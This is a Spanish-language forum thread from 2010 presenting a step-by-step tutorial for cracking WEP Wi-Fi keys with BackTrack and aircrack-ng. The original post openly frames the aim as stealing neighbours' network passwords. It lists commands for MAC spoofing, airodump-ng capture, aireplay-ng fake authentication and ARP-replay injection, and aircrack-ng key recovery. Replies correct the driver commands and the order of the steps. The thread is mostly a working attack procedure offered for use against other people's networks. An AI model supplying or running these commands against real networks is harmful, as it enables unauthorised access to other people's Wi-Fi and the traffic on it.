Página 1 de 1

Crackear Wep con BackTrack by Devilboy

Publicado: 05 Abr 2010, 12:13
por ANTRAX
Muchos se preguntarán, ¿Que es esto y de que nos sirve?
bueno simplemente nos sirve para obtener la clave wep de alguna red wifi, en pocas palabras robarnos la clave wifi de nuestros vecinos jejje.

Para este ataque necesitamos un par de cosas:

1)Yo usaré una antena de red "ALFA 500mW" , que es la que tengo a mi alcance por ahora
informacion de ALFA 500mW chequense este link y lo sabran [Enlace externo eliminado para invitados]

2)Backtrack 3, una distro de linux que sirve como Live-cd osea que no necesitamos instalar nada solo booteamos y listo.

3) Unas ganas tremendas de alcanzar el objetivo.

Nos bajamos el iso de Bt3 y lo quemamos en un cd, si ya lo tienen mucho que mejor xD[


Código:

iwconfig
Este comando nos muestra el estado de las interfaces de red
Imagen


Necesitamos activar Ipwraw, para que nuestra placa de red sirva para inyectar, para hacer esto clequeamos lo siguiente

Código:

rmmod iwl3945
modprobe ipwraw

Imagen

este paso es opcinal para el que lo quiera hacer por que a mi no me quizo dar wifi0 me marcaba error xD pero procigamos...

abrimos de nuevo el comando
Código:

iwconfig
y nos saldrá ahora esto
Imagen

como vén cambió de wlan0 a wifi0, el wifi0 es lo que necesitamos para poder seguir con el crackeo

Bien ahora lo que harémos será cambiar nuestra dirección mac:

Código:

macchanger -m 00:11:22:33:44:55 wifi0 (en mi caso sustitui wifi0 por wlan0)


Código:

macchanger -m 00:11:22:33:44:55 wifi0


podemos usar cualquier numero que queramos pero que sea en grupos de 6 ejemplo: xx:xx:xx:xx:xx:xx (en mi caso fue macchanger -m 11:01:21:01:31:01 wlan0)

Imagen


Ahora procedemos a escanear las redes a nuestro alcance

Código:

airodump-ng wifi0


el resultado será algo asi:

Imagen


Bien ahora lo que sigue será escanear la red que hayámos seleccionado

Código:

airodump-ng --channel x --write xxx wifi0


Nota: cambiar la primera "x" por el numero del canal de red que quieran crackear y las "xxx" por algun nombre que deseen no importa cual sea.

En mi caso crackearé la red llamada WebSTAR21 y el canal es el 7, entonces quedará asi:

Código:

airodump-ng --channel 7 --write exploit wifi0
(en mi caso usare airodump-ng --channel 4 --write pepe wlan0)

Imagen


Paso siguiente a capturar paquetes:

Código:

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h nuestra mac wifi0


Nota: cambiar las "x" por la dirección mac de nuestra victima, ejemplo:

Código:

aireplay-ng -3 -b 00:1D:60:37:05:99 -h 00:11:22:33:44:55 wifi0 (en mi caso aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:01:21:01:31:01 wlan0) pero procigamos xD :D

Imagen


Ahora lo que haremos es asociarnos con el router de la victima, para poder inyectar los paquetes


Código:

aireplay-ng -1 0 -e Nombre de la red -a xx:xx:xx:xx:xx:xx -h nuestra mac wifi0


recuerden cambiar las "x" por la mac de la victima, ejemplo

Código:

aireplay-ng -1 0 -e WebSTAR21 -a 00:1D:60:37:05:99 -h 00:11:22:33:44:55 wifi0 (en mi caso fue aireplay-ng -1 0 -e INFINITUMxxxx -a xx:xx:xx:xx:xx:xx -h 11:01:21:01:31:01 wlan0)

Imagen


y comienza la inyección de paquetes

si han hecho todo al pie de la letra en estos momentos el numero de ARP estará aumentando rapidamente.

a los 5 minutos ya tengo 60749 ARP, suficiente para craquear la wep

Imagen


detenemos la captura e inyección de paquetes con control + c

Imagen


pasó final, craquear la wep

Código:

aircrack-ng nombre que eligieron al principio-01.cap


ejemplo:

Código:

aircrack-ng exploit-01.cap (en mi caso seria aircrack-ng pepe-01.cap)

Imagen


Nos pedirá que seleccionemos el numero de la red victima, en este caso la mia esta en el numero 1

Imagen


¡¡¡Felicidades ya tenemos la clave wep de la red que hayamos seleccionado!!! :D

Imagen


y listo esto son una serie de pasos con los cuales pueden lograr crackear un red wep xD

este tutorial fue hecho por
Devilboy
y el caso por el que lo estoy aportando es por que es muy eficaz y les puede servir a muchos ;)

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 10 Abr 2010, 04:40
por ØnLy
Esta Bueno el Tuto gracias a Devil por hacerlo y a ANTRAX por traerlo!
Saludos!

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 10 Abr 2010, 05:01
por blackmaster1212
Perfecto, necesitaba algo asi , gracias a los dos... grandes

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 10 Abr 2010, 12:50
por $DoC
es un gran manual ANTRAX, este fué el primero que ví para crackear wep nunca me funciono por que mi tarjeta no era compatible , gracias amigo

SALUDOS!!

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 12 Abr 2010, 04:20
por ShadeHack
ANTRAX te la comiste gracias por este post :D

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 12 Abr 2010, 16:04
por FroZenFeW
el tute esta bueno pero si es verdad que lo hizo devilboy le voy a corregir algo porque quiero que los que lean aprendan
la antena de red ALFA 500mW es buena pero no usa los drivers de intel usa los de realtek en vez de
rmmod iwl3945
modprobe ipwraw
deberia ser
rmmod rtl8187
modprobe rtl8187

el paso de capturar paquetes como dice el o standard ARP-request replay se hace despues de hacer fake authentication with AP
osea podria ser
1 provar si la targeta hace inyeccion
aireplay-ng -9 -e (essid) -a (bssid) (interface)
2 hacer un fake authentication con el access point
aireplay-ng -1 6000 -o 1 -a (bssid) -h (tu mac address) -e (essid) (interface)
si identifico comprobamos
tcpdump -n -vvv -s0 -e -i <interface> | grep -i -E (RA:<tu mac address>|Authentication|ssoc)
3 capturar paquetes
aireplay-ng -3 -b (bssid) -h (tu mac address) (interface)
por ultimo despues de capturar los suficientes IVs podremos usar aircrack de las siguientes formas
aircrack-ng -b (bssid) (file name-01.cap)
aircrack-ng -a 1 -f 10

saludos

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 27 Abr 2010, 04:36
por valium7
Lo siento antrax pero lo voy a mejorar

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 18 May 2010, 15:26
por ANTRAX
Estamos para aprender uno del otro

Re: Crackear Wep con BackTrack by Devilboy

Publicado: 01 Jul 2010, 04:44
por illera88
A mi parecer como eh dicho en otro de ahi arriba es muy simple (sin explicar el por qué de cada comando) y muy lammer (solo se explica el A3+A1 que deberia hacerse alreves, primero A1 (autentificación) y luego A3 (inyección) sin explicarse A4 y A5 ni métodos de diccionario).

Como he dicho antes, si alguien quiere que hago un tuto explicando cada una de las opciones para crackear una WEP o WPA (todas las opciones) que mande un privado y si varios lo quieren hecho estará. Eso sí, explicaré TODO lo que hay en WEP no solo el A1 +A3.. (qizás sea un poco coñazo pero eso sí, muy muy efectivo)

Un saludo ANTRAX